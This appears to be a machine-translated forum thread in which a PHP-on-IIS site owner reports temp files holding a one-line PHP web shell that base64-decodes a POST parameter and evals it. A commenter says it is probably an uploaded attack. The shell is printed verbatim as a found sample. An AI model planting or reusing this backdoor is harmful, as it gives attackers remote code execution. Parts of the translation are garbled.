我已經注意到,我們的臨時目錄中有許多東西似乎與像phpA3F9.tmpPHP代碼
名稱展望,我覺得一個數字後面的內容臨時文件通過一些PHP代碼,下面的代碼將出現在幾個文件中
9990000
<?php
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
這似乎是一種攻擊嘗試,但我相信它依賴於攻擊者能夠在TMP文件夾中執行代碼。
有人可以解釋這裏發生了什麼嗎?有什麼風險?這些文件如何進入tmp文件夾?我該如何阻止他們?
我不知道,但如果是相關的,我們在IIS
運行PHP 5.5
該文件名讓我想起了MSIE臨時文件 –
也許它們被攻擊者上傳到服務器,並且如果你的'upload_tmp_dir'指向你的臨時目錄,似乎有人試圖將惡意代碼上傳到你的服務器。這些文件在腳本執行後被刪除。 – vitozev